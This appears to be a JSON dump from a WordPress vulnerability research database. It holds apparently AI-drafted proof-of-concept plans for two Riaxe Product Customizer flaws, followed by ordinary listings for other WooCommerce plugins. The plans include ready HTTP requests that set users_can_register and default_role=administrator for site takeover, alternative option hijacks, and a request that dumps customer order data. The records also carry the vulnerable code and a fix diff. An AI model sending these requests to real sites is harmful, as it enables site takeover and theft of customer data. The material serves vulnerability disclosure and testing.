Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `install-imprint` (Registered via `wp_ajax_nopriv_install-imprint`)\n- **Vulnerable Parameters**: \n - `option`: The name of the WordPress option to update.\n - `opt_value`: The new value for the specified option.\n- **Authentication**: Unauthenticated (accessible to any visitor).\n- **Preconditions**: The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point**: A `POST` request is sent to `admin-ajax.php` with `action=install-imprint`.\n2. **Hook Execution**: WordPress triggers the function associated with `wp_ajax_nopriv_install-imprint`.\n3. **Target Function**: `ink_pd_add_option()` (inferred from description) is called.\n4. **Input Handling**: The function reads `$_POST['option']` and `$_POST['opt_value']`.\n5. **Vulnerable Sink**:\n - The function calls `delete_option( $_POST['option'] )`.\n - The function calls `add_option( $_POST['option'], $_POST['opt_value'] )`.\n6. **Result**: The option in the `wp_options` table is updated to the attacker-controlled value.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `install-imprint` action **does not perform any nonce verification**. \n- **Check Needed**: No nonce should be required for this exploitation.\n- **Bypass**: If for some reason a nonce is found to be required during the PoC, the researcher should check for `wp_localize_script` calls in the plugin source that might expose a nonce to unauthenticated users on the frontend. However, based on the CVE description, the check is entirely missing.\n\n## 5. Exploitation Strategy\nThe goal is to achieve Privilege Escalation.\n\n### Step 1: Enable User Registration\nSubmit a request to set `users_can_register` to `1`.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=install-imprint&option=users_can_register&opt_value=1\n```\n\n### Step 2: Set Default Role to Administrator\nSubmit a request to set `default_role` to `administrator`.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=install-imprint&option=default_role&opt_value=administrator\n```\n\n### Step 3: Register a New Administrator (Optional Proof)\nNavigate to the registration page and create a new account.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-login.php?action=register HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\nuser_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register\n```\n\n## 6. Test Data Setup\n1. **Target Environment**: A standard WordPress installation with Riaxe Product Customizer \u003C= 2.1.2 installed.\n2. **Baseline State**:\n - `wp option get users_can_register` should return `0`.\n - `wp option get default_role` should return `subscriber`.\n3. **No Shortcodes Required**: Since the endpoint is unauthenticated and (reportedly) nonce-less, no specific page setup is required to trigger the vulnerability.\n\n## 7. Expected Results\n- The AJAX requests should return a successful status code (typically `200 OK` or a `1` response if `wp_die()` is used).\n- The `users_can_register` option in the database will change from `0` to `1`.\n- The `default_role` option in the database will change from `subscriber` to `administrator`.\n\n## 8. Verification Steps\nAfter sending the malicious POST requests, use WP-CLI to confirm the state change:\n\n```bash\n# Verify registration is enabled\nwp option get users_can_register\n# Expected Output: 1\n\n# Verify default role is admin\nwp option get default_role\n# Expected Output: administrator\n```\n\n## 9. Alternative Approaches\nIf updating core options is blocked by a security plugin or environment hardening, alternative high-impact options to update include:\n- `siteurl` or `home`: To perform a Denial of Service or Redirect hijack.\n- `admin_email`: To attempt password resets of existing admins.\n- `rewrite_rules`: To corrupt the site's routing.\n- `ink_pd_settings` (Plugin specific): To inject malicious JS\u002Fiframes if the plugin settings are rendered on the frontend.","The Riaxe Product Customizer plugin for WordPress is vulnerable to an unauthenticated arbitrary options update through its 'install-imprint' AJAX action. By exploiting this lack of authorization and validation, an attacker can overwrite critical WordPress settings, such as enabling open registration and setting the default user role to administrator, leading to full site takeover.","\u002F\u002F Inferred file path: riaxe-product-customizer\u002Friaxe-product-customizer.php\n\nadd_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');\nadd_action('wp_ajax_install-imprint', 'ink_pd_add_option');\n\nfunction ink_pd_add_option() {\n $option_name = $_POST['option'];\n $option_value = $_POST['opt_value'];\n \n \u002F\u002F Directly modifies any option without capability checks or allowlisting\n delete_option($option_name);\n add_option($option_name, $option_value);\n die();\n}","--- a\u002Friaxe-product-customizer\u002Friaxe-product-customizer.php\n+++ b\u002Friaxe-product-customizer\u002Friaxe-product-customizer.php\n@@ -1,10 +1,18 @@\n-add_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');\n add_action('wp_ajax_install-imprint', 'ink_pd_add_option');\n \n function ink_pd_add_option() {\n+ if ( ! current_user_can( 'manage_options' ) ) {\n+ wp_die( -1 );\n+ }\n+ check_ajax_referer( 'ink_pd_security', 'security' );\n+\n $option_name = isset( $_POST['option'] ) ? sanitize_text_field( $_POST['option'] ) : '';\n- $option_value = $_POST['opt_value'];\n+ $option_value = isset( $_POST['opt_value'] ) ? $_POST['opt_value'] : '';\n \n+ $allowed_options = array( 'ink_pd_custom_settings' ); \u002F\u002F Example restricted list\n+ if ( ! in_array( $option_name, $allowed_options ) ) {\n+ wp_die( 'Forbidden' );\n+ }\n+\n delete_option($option_name);\n add_option($option_name, $option_value);\n die();","The exploit targets the unauthenticated AJAX endpoint 'wp_ajax_nopriv_install-imprint' which maps to the 'ink_pd_add_option' function. To achieve privilege escalation, an attacker follows these steps: 1. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the parameters action=install-imprint, option=users_can_register, and opt_value=1. This enables site registration. 2. Send a second POST request with action=install-imprint, option=default_role, and opt_value=administrator. This ensures all new registrants are granted administrative privileges. 3. Navigate to \u002Fwp-login.php?action=register and register a new account, which will automatically be assigned the 'administrator' role. No authentication or nonces are required for this exploit.","2026-04-16 15:28:21","2026-04-16 15:28:35",{"id":96,"url_slug":97,"title":98,"description":99,"plugin_slug":4,"theme_slug":35,"affected_versions":100,"patched_in_version":35,"severity":60,"cvss_score":61,"cvss_vector":101,"vuln_type":102,"published_date":103,"updated_date":104,"references":105,"days_to_patch":35,"patch_diff_files":107,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":14,"research_plan":108,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":52,"research_started_at":109,"research_completed_at":110,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2026-3594","riaxe-product-customizer-unauthenticated-sensitive-information-disclosure-via-orders-rest-api-endpoint","Riaxe Product Customizer \u003C= 2.4 - Unauthenticated Sensitive Information Disclosure via '\u002Forders' REST API Endpoint","The Riaxe Product Customizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4 via the '\u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders' REST API endpoint. The endpoint is registered with 'permission_callback' set to '__return_true', meaning no authentication or authorization checks are performed. The endpoint queries WooCommerce order data from the database and returns it to the requester, including customer first and last names, customer IDs, order IDs, order totals, order dates, currencies, and order statuses. This makes it possible for unauthenticated attackers to extract sensitive customer and order information from the WooCommerce store.","\u003C=2.4","CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-04-07 17:37:29","2026-04-08 06:43:38",[106],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2ffd6393-6604-48d9-ba22-7d989305e9ed?source=api-prod",[],"This research plan outlines the technical steps required to demonstrate the unauthenticated sensitive information disclosure vulnerability in the **Riaxe Product Customizer** plugin.\n\n### 1. Vulnerability Summary\nThe Riaxe Product Customizer plugin (\u003C= 2.4) registers a custom WordPress REST API endpoint `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders` intended to retrieve order data. However, the `permission_callback` for this route is set to `__return_true`, which bypasses WordPress's built-in authentication and authorization mechanisms. Consequently, any unauthenticated user can query the endpoint to retrieve sensitive WooCommerce order details, including customer names, IDs, order totals, and statuses.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders`\n* **HTTP Method:** `GET` (inferred)\n* **Authentication:** None required (`permission_callback` is `__return_true`).\n* **Payload:** No specific payload required; a simple GET request triggers the data leak.\n* **Preconditions:** \n 1. The plugin \"Riaxe Product Customizer\" must be active.\n 2. WooCommerce must be installed and have existing order data for the exposure to be impactful.\n\n### 3. Code Flow (Inferred)\n1. **Hook Registration:** The plugin likely uses the `rest_api_init` hook to register its API routes.\n2. **Route Definition:** Inside the registration function, `register_rest_route` is called:\n ```php\n register_rest_route('InkXEProductDesignerLite', '\u002Forders', array(\n 'methods' => 'GET', \u002F\u002F or WP_REST_Server::READABLE\n 'callback' => array($this, 'get_all_orders'), \u002F\u002F (inferred callback name)\n 'permission_callback' => '__return_true', \u002F\u002F THE VULNERABILITY\n ));\n ```\n3. **Data Retrieval:** The callback function queries the WooCommerce orders (likely using `wc_get_orders` or a direct global `$wpdb` query on `wp_posts` and `wp_postmeta`).\n4. **Data Output:** The function returns a `WP_REST_Response` containing an array of order objects, which WordPress serializes into JSON.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `permission_callback` is set to `__return_true`. In the WordPress REST API, when a route is configured this way, **no X-WP-Nonce header or cookie-based authentication is required** to access the endpoint.\n\nIf the environment configuration or a security plugin later enforced a global REST nonce requirement, the nonce for the `wp_rest` action would be needed. However, for a standard PoC of this specific vulnerability, **no nonce is expected to be necessary.**\n\n### 5. Exploitation Strategy\nThe exploitation involves a direct request to the exposed REST endpoint.\n\n* **Step 1:** Verify the endpoint exists and is reachable.\n* **Step 2:** Send a GET request to the target.\n* **Step 3:** Parse the JSON response to confirm the presence of customer names and order totals.\n\n**HTTP Request (via `http_request` tool):**\n```http\nGET \u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders HTTP\u002F1.1\nHost: localhost:8080\nAccept: application\u002Fjson\n```\n\n### 6. Test Data Setup\nTo verify the disclosure, mock data must exist in the WooCommerce system.\n\n1. **Install\u002FActivate Riaxe Product Customizer:** Ensure version \u003C= 2.4 is installed.\n2. **Install\u002FActivate WooCommerce:** The plugin depends on WooCommerce data.\n3. **Create a Customer User:**\n ```bash\n wp user create victim_customer victim@example.com --role=customer --user_pass=password123\n ```\n4. **Create Mock Orders:** Use WP-CLI to generate an order (requires WooCommerce CLI support or manual DB insertion).\n ```bash\n # Alternative: Use a PHP script via wp eval to create an order\n wp eval '\n $order = wc_create_order();\n $order->set_billing_first_name(\"John\");\n $order->set_billing_last_name(\"Doe\");\n $order->set_total(99.99);\n $order->set_status(\"completed\");\n $order->save();\n '\n ```\n\n### 7. Expected Results\nA successful exploit will return a `200 OK` status and a JSON body containing an array of order objects.\n\n**Example Response Body:**\n```json\n[\n {\n \"order_id\": 123,\n \"customer_id\": 5,\n \"first_name\": \"John\",\n \"last_name\": \"Doe\",\n \"order_total\": \"99.99\",\n \"order_date\": \"2023-10-27 10:00:00\",\n \"currency\": \"USD\",\n \"status\": \"completed\"\n }\n]\n```\n\n### 8. Verification Steps\n1. **Identify Order in Database:**\n ```bash\n wp db query \"SELECT ID, post_status FROM wp_posts WHERE post_type='shop_order' LIMIT 1;\"\n ```\n2. **Compare API Output:** Match the `order_id` and `order_total` from the HTTP response with the data returned by the CLI command:\n ```bash\n wp post get \u003CID> --field=post_title\n # and\n wp post meta get \u003CID> _order_total\n ```\n3. **Check Sensitivity:** Confirm that the `first_name` and `last_name` returned by the API match the billing information of the user associated with that order.\n\n### 9. Alternative Approaches\nIf the `\u002Forders` endpoint is not found, it is possible the namespace or route suffix varies slightly between minor versions. \n\n1. **Enumerate Routes:** Request the main REST index to discover the exact path:\n ```bash\n GET \u002Fwp-json\u002F\n ```\n Then search the response for \"InkXE\".\n2. **Check for POST:** If `GET` returns a 405 Method Not Allowed, try a `POST` request with an empty body:\n ```bash\n POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders HTTP\u002F1.1\n Content-Length: 0\n ```\n3. **Examine Sub-directories:** If the plugin follows a different naming convention, grep the source code for `register_rest_route` to find the exact string:\n ```bash\n grep -rn \"register_rest_route\" wp-content\u002Fplugins\u002Friaxe-product-customizer\u002F\n ```","2026-04-17 20:38:10","2026-04-17 20:38:26",{"slug":7,"display_name":7,"profile_url":8,"plugin_count":112,"total_installs":11,"avg_security_score":25,"avg_patch_time_days":113,"trust_score":114,"computed_at":115},1,30,40,"2026-04-18T19:30:10.597Z",[117,143,167,188,210],{"slug":118,"name":119,"version":120,"author":121,"author_profile":122,"description":123,"short_description":124,"active_installs":125,"downloaded":126,"rating":127,"num_ratings":128,"last_updated":129,"tested_up_to":130,"requires_at_least":131,"requires_php":132,"tags":133,"homepage":132,"download_link":139,"security_score":140,"vuln_count":141,"unpatched_count":141,"last_vuln_date":35,"fetched_at":142},"checkout-field-editor-and-manager-for-woocommerce","Checkout Field Editor for WooCommerce – Checkout Manager","3.0.2","acowebs","https:\u002F\u002Fprofiles.wordpress.org\u002Facowebs\u002F","\u003Cp>WooCommerce checkout field editor and manager plugin helps to manage the checkout page fields in WooCommerce Store.\u003Cbr \u002F>\nIt’s drag and drop form builder helps editing checkout fields easier. It can use to add, modify or hide default WooCommerce checkout fields.\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwcfe-free-demo.acowebs.com\u002Fwp-admin\u002Fadmin.php?page=awcfe_admin_ui#\u002Fsection\u002Fbilling\" rel=\"nofollow ugc\">Try the Demo\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Facowebs.com\u002Fguideline\u002Fplugin-docs-faqs\u002Fwcfem\u002F\" rel=\"nofollow ugc\">Documents\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Facowebs.com\u002Fwoocommerce-checkout-field-editor-and-manager\u002F\" rel=\"nofollow ugc\">Pro Version\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>HOW TO manage WooCommerce Checkout Fields?\u003C\u002Fh3>\n\u003Cp>After activating WooCommerce checkout field editor plugin, go to the menu WooCommerce >>Checkout Field in WordPress left menu bar.\u003Cbr \u002F>\nHere you can manage all the fields available in WooCommerce and also you can add WooCommerce custom checkout fields\u003C\u002Fp>\n\u003Ch4>Check out our video demo on how this works:\u003C\u002Fh4>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Flo0vHSmX9MU?version=3&rel=0&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch3>Following Fields are supported\u003C\u002Fh3>\n\u003Cp>✅ \u003Cstrong>Text Field\u003C\u002Fstrong> – \u003Cem>Input type text, Can use for single line texts\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Email Field\u003C\u002Fstrong> – \u003Cem>Input type email\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Password Field\u003C\u002Fstrong> – \u003Cem>Input type Password\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Phone Field\u003C\u002Fstrong> – \u003Cem>Input type telephone number\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Select Field\u003C\u002Fstrong> – \u003Cem>Input type select\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Textarea\u003C\u002Fstrong> – \u003Cem>Textarea checkout field, Can use for entering multiline texts\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Radio\u003C\u002Fstrong> – \u003Cem>Set radio fields to choose from\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Paragraph\u003C\u002Fstrong> – \u003Cem>Paragraph field can be used to show instructions on checkout fields, It can use to show messages in between checkout fields\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Header\u003C\u002Fstrong> – \u003Cem>Header fields can use to set html Header tag in woocommerce checkout fields, It provides h1 to h6 variations\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Checkbox Field\u003C\u002Fstrong> – \u003Cem>Input type Checkbox\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Number Field\u003C\u002Fstrong> – \u003Cem>Input type number\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>URL Field\u003C\u002Fstrong> – \u003Cem>Input type url\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>✅ \u003Cstrong>Toggle switch\u003C\u002Fstrong> – \u003Cem>switch field\u003C\u002Fem>\u003C\u002Fp>\n\u003Ch3>CHECKOUT FIELD EDITOR FEATURES\u003C\u002Fh3>\n\u003Cp>👉 Edit Default Fields – Checkout field manager will help to edit the default woocommerce checkout fields\u003C\u002Fp>\n\u003Cp>👉 Add new Fields – You can add new fields to checkout page\u003C\u002Fp>\n\u003Cp>👉 Change Fields Order – It can drag and adjust the fields position,\u003C\u002Fp>\n\u003Cp>👉 Hide Checkout Fields – It can hide the default WooCommerce checkout fields\u003C\u002Fp>\n\u003Cp>👉 Enable or Disable Checkout Fields – It can Enable or Disable WooCommerce checkout fields\u003C\u002Fp>\n\u003Cp>👉 Show in Order Details – Checkout fields filled by customer can be view on order details\u003C\u002Fp>\n\u003Cp>👉 Show in Email Details – WooCommerce Checkout fields submitted by customer can be view on order emails\u003C\u002Fp>\n\u003Cp>👉 Adjust the column width – It can adjust to show fields in half width or full width in checkout page\u003C\u002Fp>\n\u003Cp>👉 Set Custom CSS class – It can set custom css class for individual checkout fields\u003C\u002Fp>\n\u003Cp>👉 WPML and Polylang support – Multilingual plugins WPML and Poly lang is supported\u003C\u002Fp>\n\u003Ch3>DEMO – CHECK THIS OUT IN REAL\u003C\u002Fh3>\n\u003Cp>🔗 \u003Ca href=\"https:\u002F\u002Fwcfe-free-demo.acowebs.com\u002Fcheckout\u002F?add-to-cart=32\" rel=\"nofollow ugc\">Front end Demo\u003C\u002Fa>\u003Cbr \u002F>\n🔗 \u003Ca href=\"https:\u002F\u002Fwcfe-free-demo.acowebs.com\u002Fwp-admin\u002Fadmin.php?page=awcfe_admin_ui#\u002Fsection\u002Fbilling\" rel=\"nofollow ugc\">Backend Demo\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>PRO FEATURES\u003C\u002Fh3>\n\u003Cp>👉 All features on free version\u003C\u002Fp>\n\u003Cp>👉 24+ Field Types.\u003C\u002Fp>\n\u003Cp>👉 Conditional Checkout Fields.\u003C\u002Fp>\n\u003Cp>👉 Conditional Checkout sections.\u003C\u002Fp>\n\u003Cp>👉 Conditional rules based on existing fields, product, product variations, category, user role, shipping method and payment method.\u003C\u002Fp>\n\u003Cp>👉 Add fields to checkout and my account page account registration.\u003C\u002Fp>\n\u003Cp>👉 Create new sections other than default sections.\u003C\u002Fp>\n\u003Cp>👉 New Sections available at 13 different positions.\u003C\u002Fp>\n\u003Cp>👉 Edit, Duplicate and delete custom sections.\u003C\u002Fp>\n\u003Cp>👉 Custom validation rules using RegEx for text and textarea input.\u003C\u002Fp>\n\u003Cp>👉 Price option: add extra fee based on field selection.\u003C\u002Fp>\n\u003Cp>👉 Option to add tax for extra fee added.\u003C\u002Fp>\n\u003Ch3>Premium Checkout Fields\u003C\u002Fh3>\n\u003Cpre>\u003Ccode>1. Text\n2. Hidden\n3. Email\n4. Telephone\n5. Password\n6. Number\n7. Textarea\n8. Radio\n9. Select\n10. Multi Select\n11. Checkbox\n12. Checkbox Group\n13. Heading\n14. Paragraph\n15. Label\n16. Date picker\n17. Time picker\n18. Datetime picker\n19. Color picker\n20. File Upload\n21. Google place select\n22. Image group\n23. URL\n24. Toggle switch\n25. Color group\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>➡ \u003Cstrong>\u003Ca href=\"https:\u002F\u002Facowebs.com\u002Fwoocommerce-checkout-field-editor-and-manager\u002F\" rel=\"nofollow ugc\">GET PREMIUM VERSION NOW!\u003C\u002Fa> \u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>PRO DEMO – CHECK THIS OUT IN REAL\u003C\u002Fh3>\n\u003Cp>🔗 \u003Ca href=\"https:\u002F\u002Fwcfe-demo.acowebs.com\u002F\" rel=\"nofollow ugc\">Front end Demo\u003C\u002Fa>\u003Cbr \u002F>\n🔗 \u003Ca href=\"https:\u002F\u002Fwcfe-demo.acowebs.com\u002Fwp-admin\u002Fadmin.php?page=awcfe_admin_ui#\u002F\" rel=\"nofollow ugc\">Backend Demo\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Why Acowebs?\u003C\u002Fh3>\n\u003Cp>Acowebs is responsible for empowering your e-commerce stores with reliable Shopify applications and WooCommerce plugins. We own a team of experts who develop the WordPress plugins and themes to offer a great customer experience. Since we are an award-winning software development company, our team of professionals offers incredible support to improve the User experience.\u003C\u002Fp>\n\u003Cp>Check out our other WordPress plugins \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Facowebs\u002F#content-plugins\" rel=\"nofollow ugc\">here\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>What our customer says:\u003C\u002Fh3>\n\u003Cp>“The checkout field editor for woocommerce plugin helped me manage checkout fields in-store easily. It is easy now to use drag-and-drop for editing the checkout fields. There are a lot more features in the premium version than free! Thanks to the team for the quick support. Must-try plugin!”.\u003C\u002Fp>\n\u003Cp>“Very well developed and high-end user Experience. Can certainly go for custom check out options and advanced field editor options”\u003C\u002Fp>\n\u003Ch3>OTHER USEFUL LINKS\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Facowebs.com\u002Fwoocommerce-checkout-field-editor-and-manager\u002F\" rel=\"nofollow ugc\">Find all PRO features\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Facowebs.com\u002Fguideline\u002Fplugin-docs-faqs\u002Fwcfem\u002F\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Facowebs.com\u002Fwoocommerce-plugins\u002F\" rel=\"nofollow ugc\">Find Our Other Plugins\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fsupport.acowebs.com\u002Fportal\u002Fnewticket\" rel=\"nofollow ugc\">Support Ticket\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002Facowebs\" rel=\"nofollow ugc\">Facebook\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Ftwitter.com\u002Facowebs\" rel=\"nofollow ugc\">Twitter\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fchannel\u002FUCXoOjbKiXjDocNMe8qd3WHw\" rel=\"nofollow ugc\">YouTube\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n","WooCommerce checkout field editor and manager helps to manage checkout fields in WooCommerce",20000,627643,98,161,"2026-02-10T10:40:00.000Z","6.9.4","4.0","",[134,135,136,137,138],"checkout-field-customizer","checkout-form-designer","checkout-form-editor","woocommerce-checkout-field-manager","woocommerce-custom-checkout-fields","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcheckout-field-editor-and-manager-for-woocommerce.3.0.2.zip",100,0,"2026-04-16T10:56:18.058Z",{"slug":144,"name":145,"version":146,"author":147,"author_profile":148,"description":149,"short_description":150,"active_installs":125,"downloaded":151,"rating":152,"num_ratings":153,"last_updated":154,"tested_up_to":130,"requires_at_least":155,"requires_php":156,"tags":157,"homepage":162,"download_link":163,"security_score":164,"vuln_count":165,"unpatched_count":141,"last_vuln_date":166,"fetched_at":142},"email-templates","Email Templates Customizer and Designer for WordPress and WooCommerce","1.5.11","Saad Iqbal","https:\u002F\u002Fprofiles.wordpress.org\u002Fsaadiqbal\u002F","\u003Cp>Email Templates is a WordPress plugin that allows you to customize your WooCommerce and WordPress website’s default transactional email designs and templates.\u003C\u002Fp>\n\u003Cp>The easy-to-use editor lets you choose a template style, and you can customize it by adding a logo or text, changing colors, and editing the footer.\u003C\u002Fp>\n\u003Ch4>Why use Email templates for your WordPress\u002FWooCommerce website?\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Live preview your WordPress and WooCommerce emails\u003C\u002Fli>\n\u003Cli>Customize emails to match your brand’s color theme\u003C\u002Fli>\n\u003Cli>Customize your email’s heading, subtitle, and body text (including header and footer text)\u003C\u002Fli>\n\u003Cli>Choose from a variety of template styles\u003C\u002Fli>\n\u003Cli>Configure settings like the sender’s name and email address\u003C\u002Fli>\n\u003Cli>Send test emails to the administrator’s email address\u003C\u002Fli>\n\u003Cli>View your WooCommerce order emails or choose to view a mockup template.\u003C\u002Fli>\n\u003Cli>Select email type from a dropdown list – New order, canceled order, customer processing order, customer completed order, customer refunded order, customer on-hold order, customer invoice, failed order, new account, customer note, reset password.\u003C\u002Fli>\n\u003Cli>Each email type has a default email template and template settings\u003C\u002Fli>\n\u003Cli>Import\u002Fexport custom style settings\u003C\u002Fli>\n\u003Cli>Send preview email after importing custom style settings\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Compatible with Post SMTP Mailer\u002FEmail Log – Best Mail SMTP For WP\u003C\u002Fh4>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fpost-smtp\u002F\" rel=\"ugc\">PostSMTP\u003C\u002Fa> is a next-generation WP Mail SMTP plugin that assists and improves the email deliverability process of your WordPress website.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Easy-to-use and reliable\u003C\u002Fstrong> – 300,000+ customers trust Post SMTP Mailer to send their daily WordPress emails to millions of users worldwide.\u003C\u002Fp>\n\u003Ch3>Email Templates Features\u003C\u002Fh3>\n\u003Ch4>WordPress Email Template – General Settings\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Choose the size of your email template (boxed or full-width)\u003C\u002Fli>\n\u003Cli>Add custom CSS to your email template\u003C\u002Fli>\n\u003Cli>Choose the background color for your email template\u003C\u002Fli>\n\u003Cli>Resize the body of the email box using a slider\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>WordPress Email Template – Header Settings\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Add an image to your email template’s header\u003C\u002Fli>\n\u003Cli>Add text and color to your email header.\u003C\u002Fli>\n\u003Cli>Choose an alignment for the email’s header (Left, Center, Right)\u003C\u002Fli>\n\u003Cli>Increase or decrease the size of the text in the header.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>WordPress Email Template – Email Body Settings\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Set a background color for the email body\u003C\u002Fli>\n\u003Cli>Set a text color for links in the email body\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>WordPress Email Template – Footer Settings\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Edit the text on the email footer\u003C\u002Fli>\n\u003Cli>Choose an alignment for the email footer (Left, Center, Right)\u003C\u002Fli>\n\u003Cli>Set a background color for the email footer\u003C\u002Fli>\n\u003Cli>Resize the footer text using a slider\u003C\u002Fli>\n\u003Cli>Set the color of the text on the footer\u003C\u002Fli>\n\u003Cli>Enable\u002Fdisable the link to the plugin page (Powered by)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Minimum Requirements\u003C\u002Fh4>\n\u003Cp>WordPress 4.0.0\u003C\u002Fp>\n\u003Ch4>Help with translations\u003C\u002Fh4>\n\u003Cp>Send your translations to \u003Ca href=\"https:\u002F\u002Fwww.transifex.com\u002Fprojects\u002Fp\u002Fwp-email-templates\u002F\" rel=\"nofollow ugc\">Transifex\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Currently Available in:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>English\u003C\u002Fli>\n\u003Cli>Spanish\u003C\u002Fli>\n\u003Cli>French\u003C\u002Fli>\n\u003Cli>Chinese\u003C\u002Fli>\n\u003Cli>Portuguese\u003C\u002Fli>\n\u003Cli>Dutch\u003C\u002Fli>\n\u003Cli>Persian\u003C\u002Fli>\n\u003Cli>Russian\u003C\u002Fli>\n\u003Cli>German\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Collaborate in Github\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fwpexpertsio\u002Fwordpress-email-templates\" rel=\"nofollow ugc\">https:\u002F\u002Fgithub.com\u002Fwpexpertsio\u002Fwordpress-email-templates\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Latest Update\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>Email Templates v1.5\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Text box implementation\u003C\u002Fstrong>\u003Cbr \u002F>\nAdded a text box above the slider so the Administrator can manually enter the number. In the color option, the admin can select the color from the color grid and can also enter the color code manually.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Template 